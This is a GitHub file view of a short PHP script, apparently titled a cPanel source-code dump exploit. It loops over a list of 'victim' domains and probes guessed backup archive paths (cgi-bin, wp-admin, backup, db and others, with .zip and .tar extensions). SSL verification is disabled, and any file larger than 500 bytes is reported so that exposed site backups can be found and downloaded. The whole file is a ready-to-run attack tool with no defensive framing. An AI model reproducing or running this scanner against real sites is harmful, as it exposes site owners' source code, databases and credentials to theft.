-
Notifications
You must be signed in to change notification settings - Fork 3
/
Copy pathcpanel_source_code_dump_exploit.php
41 lines (34 loc) · 1.13 KB
/
cpanel_source_code_dump_exploit.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
<?php
//Written By : Jasminder Pal Singh
flush();
ob_flush();
// Test
$victim_urls = "comma separated domain names";
$exp_vu = explode(",",$victim_urls);
$vectors = array(".well-known","cgi-bin","backup","site_backup","bk","dsa","wp-admin","wp-content","wp-includes","app","db");
$extension = array(".zip",".tar",".tar.gz",".tar.bz2");
function retrieve_remote_file_size($url){
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch, CURLOPT_HEADER, TRUE);
curl_setopt($ch, CURLOPT_NOBODY, TRUE);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$data = curl_exec($ch);
$size = curl_getinfo($ch, CURLINFO_CONTENT_LENGTH_DOWNLOAD);
curl_close($ch);
return $size;
}
foreach($exp_vu as $victim_url){
foreach($vectors as $attack){
$vectored_url = "http://".$victim_url."/".$attack;
foreach($extension as $sn_ext){
$fn_url = $vectored_url . $sn_ext;
if(retrieve_remote_file_size($fn_url) > 500){
echo $fn_url. " = ". retrieve_remote_file_size($fn_url) . "<br>";
flush();
ob_flush();
}
}
}
}
?>